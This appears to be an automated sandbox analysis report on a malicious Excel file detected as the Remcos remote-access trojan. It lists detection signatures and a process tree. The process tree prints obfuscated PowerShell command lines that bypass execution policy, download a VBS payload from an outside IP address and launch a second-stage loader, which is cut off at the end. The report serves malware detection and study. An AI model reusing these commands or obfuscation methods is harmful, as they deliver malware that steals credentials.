Edit tour
Windows
Analysis Report
PO_304234.xls
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3528 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3776 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3888 cmdline:
"C:\Window s\system32 \cmd.exe" "/c poWerS HeLL.exe -Ex bYPASs -nop -w 1 -c DE vICEcrEDEN TiAlDEPlOy MeNT.EXe ; iEX($(ieX ('[sYstem. tEXt.ENcOD iNG]'+[Cha r]58+[CHAr ]58+'uTF8. GETSTRiNG( [sysTem.cO nVert]'+[c HAR]0X3a+[ CHaR]58+'f ROMbaSe64s TRIng('+[c har]34+'JD FIaWVNN24g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBhREQtVH lQRSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbWVt QmVyZEVGSW 5pVElPbiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAn W0RsbEltcG 9ydCgiVXJM TU9uLkRMTC IsICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg dkUsc3RyaW 5nICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHRiQm4s c3RyaW5nIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIH pDclZDWnRo LHVpbnQgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgak tGR1Nmd3Zh aVIsSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIE1uVE9x KTsnICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uQU 1FICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICJ2UXdR T05JalVjbS IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLW5BTUVz UEFjZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBNQW cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLVBhc3NU aHJ1OyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAkMU hpZU03bjo6 VVJMRG93bm xvYWRUb0Zp bGUoMCwiaH R0cDovLzE5 Mi4zLjE5My 4xNTUveGFt cHAvYm96L3 dlY3JlYXRl ZGJ1dHRlcn Ntb290aGJ1 dHRlcnRoaW 5ncy50SUYi LCIkRW52Ok FQUERBVEFc d2VjcmVhdG VkYnV0dGVy c21vb3RoYn V0dGVydGhp bi52QlMiLD AsMCk7U1RB UlQtc0xFZX AoMyk7c1Rh UnQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIiRFbn Y6QVBQREFU QVx3ZWNyZW F0ZWRidXR0 ZXJzbW9vdG hidXR0ZXJ0 aGluLnZCUy I='+[cHAR] 34+'))'))) " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3912 cmdline:
poWerSHeLL .exe -Ex b YPASs -nop -w 1 -c DEvICE crEDENTiAl DEPlOyMeNT .EXe ; iEX ($(ieX('[s Ystem.tEXt .ENcODiNG] '+[Char]58 +[CHAr]58+ 'uTF8.GETS TRiNG([sys Tem.cOnVer t]'+[cHAR] 0X3a+[CHaR ]58+'fROMb aSe64sTRIn g('+[char] 34+'JDFIaW VNN24gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgPSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBh REQtVHlQRS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbWVtQmVy ZEVGSW5pVE lPbiAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAnW0Rs bEltcG9ydC giVXJMTU9u LkRMTCIsIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE NoYXJTZXQg PSBDaGFyU2 V0LlVuaWNv ZGUpXXB1Ym xpYyBzdGF0 aWMgZXh0ZX JuIEludFB0 ciBVUkxEb3 dubG9hZFRv RmlsZShJbn RQdHIgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgdkUs c3RyaW5nIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIH RiQm4sc3Ry aW5nICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIHpDcl ZDWnRoLHVp bnQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgaktGR1 Nmd3ZhaVIs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE 1uVE9xKTsn ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IC1uQU1FIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC J2UXdRT05J alVjbSIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLW 5BTUVzUEFj ZSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBNQWcgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLV Bhc3NUaHJ1 OyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAkMUhpZU 03bjo6VVJM RG93bmxvYW RUb0ZpbGUo MCwiaHR0cD ovLzE5Mi4z LjE5My4xNT UveGFtcHAv Ym96L3dlY3 JlYXRlZGJ1 dHRlcnNtb2 90aGJ1dHRl cnRoaW5ncy 50SUYiLCIk RW52OkFQUE RBVEFcd2Vj cmVhdGVkYn V0dGVyc21v b3RoYnV0dG VydGhpbi52 QlMiLDAsMC k7U1RBUlQt c0xFZXAoMy k7c1RhUnQg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IiRFbnY6QV BQREFUQVx3 ZWNyZWF0ZW RidXR0ZXJz bW9vdGhidX R0ZXJ0aGlu LnZCUyI='+ [cHAR]34+' ))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 4012 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\imlwlg jg\imlwlgj g.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 4020 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES89F7.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\iml wlgjg\CSCE 8D62BF91CF 49AAAEBCC2 A37BB3C45C .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3104 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\wecre atedbutter smoothbutt erthin.vBS " MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3180 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' J? ? ? ? ? Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy ? ? ? ? ?G w? ? ? ? ? I? ? ? ? ? ? ? ? ? ?9 ? ? ? ? ?C ? ? ? ? ?? ? ? ? ?Jw Bo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh ? ? ? ? ?D g? ? ? ? ? M? ? ? ? ? ? ? ? ? ?z ? ? ? ? ?D E? ? ? ? ? M? ? ? ? ? ? ? ? ? ?0 ? ? ? ? ?C 4? ? ? ? ? dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp ? ? ? ? ?H Y? ? ? ? ? ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQ B0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi ? ? ? ? ?H M? ? ? ? ? Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ? Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ? Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw ? ? ? ? ?u ? ? ? ? ?G o? ? ? ? ? c? ? ? ? ? Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp ? ? ? ? ?G U? ? ? ? ? bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?Tw Bi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cw B0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?Vw Bl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu ? ? ? ? ?H Q? ? ? ? ? Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC ? ? ? ? ?H k? ? ? ? ? d? ? ? ? ? Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ? J? ? ? ? ? B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl ? ? ? ? ?G 4? ? ? ? ? d? ? ? ? ? ? ? ? ? ?u ? ? ? ? ?E Q? ? ? ? ? bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh ? ? ? ? ?C g? ? ? ? ? J? ? ? ? ? Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy ? ? ? ? ?G w? ? ? ? ? KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl ? ? ? ? ?F Q? ? ? ? ? ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0 ? ? ? ? ?G U? ? ? ? ? bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF ? ? ? ? ?G 4? ? ? ? ? YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ ? ? ? ? ?6 ? ? ? ? ?D o? ? ? ? ? VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By ? ? ? ? ?G k? ? ? ? ? bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn ? ? ? ? ?G U? ? ? ? ? QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz?